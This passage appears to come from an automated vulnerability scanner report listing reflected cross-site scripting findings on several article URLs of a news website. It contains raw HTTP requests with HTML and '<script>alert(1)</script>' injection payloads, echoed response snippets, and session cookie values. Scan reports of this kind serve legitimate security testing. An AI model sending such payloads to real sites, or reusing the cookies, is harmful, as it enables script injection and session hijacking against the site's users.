Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/article94551"><a>4b58d9a3886/224201355/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ffb78"><a>673a9b06038 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/article/224201355ffb78"><a>673a9b06038/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 592a8"><a>c6d4cf8a460 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/224201355/index.html592a8"><a>c6d4cf8a460 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 95e87'><a>f16c9ab406b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/224201355/index.html95e87'><a>f16c9ab406b HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>N.J. Supr ...[SNIP]... <input type='hidden' name='article_url' value='http://www.darkreading.com/security/article/224201355/index.html95e87'><a>f16c9ab406b'> ...[SNIP]...
3.513. http://www.darkreading.com/security/article/224201355/index.html [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/security/article/224201355/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e124c"><script>alert(1)</script>7dc74d8a677 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /security/article/224201355/index.html?e124c"><script>alert(1)</script>7dc74d8a677=1 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f8c4"><a>a6cfa76bb5d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/article8f8c4"><a>a6cfa76bb5d/224500077/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cfe40"><a>72169a24de8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/article/224500077cfe40"><a>72169a24de8/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload adb79'><a>59624aa81bc was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/224500077/index.htmladb79'><a>59624aa81bc HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 901ec"><a>6587cd9b73c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/224500077/index.html901ec"><a>6587cd9b73c HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>Why Emplo ...[SNIP]... F%2Fwww.darkreading.com%2Fsecurity%2Farticle%2F224500077%2Findex.html901ec%22%3E%3Ca%3E6587cd9b73c&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/security/article/224500077/index.html901ec"><a>6587cd9b73c"> ...[SNIP]...
3.518. http://www.darkreading.com/security/article/224500077/index.html [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/security/article/224500077/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 11601"><script>alert(1)</script>c58b41d8f8c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /security/article/224500077/index.html?11601"><script>alert(1)</script>c58b41d8f8c=1 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12f17"><a>c1a5564ba59 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/article12f17"><a>c1a5564ba59/224600304/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e1d0"><a>79ea45d8006 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/article/2246003044e1d0"><a>79ea45d8006/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f7329'><a>584510cc553 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/224600304/index.htmlf7329'><a>584510cc553 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91419"><a>1b75f9d5df4 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/224600304/index.html91419"><a>1b75f9d5df4 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>Tech Insi ...[SNIP]... F%2Fwww.darkreading.com%2Fsecurity%2Farticle%2F224600304%2Findex.html91419%22%3E%3Ca%3E1b75f9d5df4&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/security/article/224600304/index.html91419"><a>1b75f9d5df4"> ...[SNIP]...
3.523. http://www.darkreading.com/security/article/224600304/index.html [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/security/article/224600304/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ae33"><script>alert(1)</script>883af8c2c20 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /security/article/224600304/index.html?2ae33"><script>alert(1)</script>883af8c2c20=1 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3a67"><a>15ae743f0a0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/articleb3a67"><a>15ae743f0a0/224700541/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 22199"><a>74df5925f00 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/article/22470054122199"><a>74df5925f00/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 921b8'><a>dd2f04f9437 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/224700541/index.html921b8'><a>dd2f04f9437 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5231b"><a>3399620edf was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/224700541/index.html5231b"><a>3399620edf HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>New IM Wo ...[SNIP]... 2F%2Fwww.darkreading.com%2Fsecurity%2Farticle%2F224700541%2Findex.html5231b%22%3E%3Ca%3E3399620edf&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/security/article/224700541/index.html5231b"><a>3399620edf"> ...[SNIP]...
3.528. http://www.darkreading.com/security/article/224700541/index.html [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/security/article/224700541/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a17bd"><script>alert(1)</script>fcb1d0ab009 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /security/article/224700541/index.html?a17bd"><script>alert(1)</script>fcb1d0ab009=1 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>New IM Wo ...[SNIP]... icle%2F224700541%2Findex.html%3Fa17bd%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Efcb1d0ab009%3D1&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/security/article/224700541/index.html?a17bd"><script>alert(1)</script>fcb1d0ab009=1"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6813a"><a>bab993be2c8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/article6813a"><a>bab993be2c8/224900081/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 429e3"><a>e42670a8d27 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/article/224900081429e3"><a>e42670a8d27/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a61c4'><a>32bd54ef1c8 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/224900081/index.htmla61c4'><a>32bd54ef1c8 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d64f2"><a>9f3f736b188 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/224900081/index.htmld64f2"><a>9f3f736b188 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>Five Ways ...[SNIP]... F%2Fwww.darkreading.com%2Fsecurity%2Farticle%2F224900081%2Findex.htmld64f2%22%3E%3Ca%3E9f3f736b188&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/security/article/224900081/index.htmld64f2"><a>9f3f736b188"> ...[SNIP]...
3.533. http://www.darkreading.com/security/article/224900081/index.html [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/security/article/224900081/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25562"><script>alert(1)</script>0fd12523002 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /security/article/224900081/index.html?25562"><script>alert(1)</script>0fd12523002=1 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40613"><a>f82c50f191f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/article40613"><a>f82c50f191f/225200571/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ff10"><a>8be0a123dd3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/article/2252005711ff10"><a>8be0a123dd3/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 3dcbf'><a>4f0bb9c1a70 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/225200571/index.html3dcbf'><a>4f0bb9c1a70 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45647"><a>519524b598b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/225200571/index.html45647"><a>519524b598b HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<html>
<head>
<title>Tech Insi
...[SNIP]...
F%2Fwww.darkreading.com%2Fsecurity%2Farticle%2F225200571%2Findex.html45647%22%3E%3Ca%3E519524b598b&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/security/article/225200571/index.html45647"><a>519524b598b">
...[SNIP]...
3.538. http://www.darkreading.com/security/article/225200571/index.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.darkreading.com
Path: /security/article/225200571/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8c99"><script>alert(1)</script>217d77e3421 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /security/article/225200571/index.html?c8c99"><script>alert(1)</script>217d77e3421=1 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
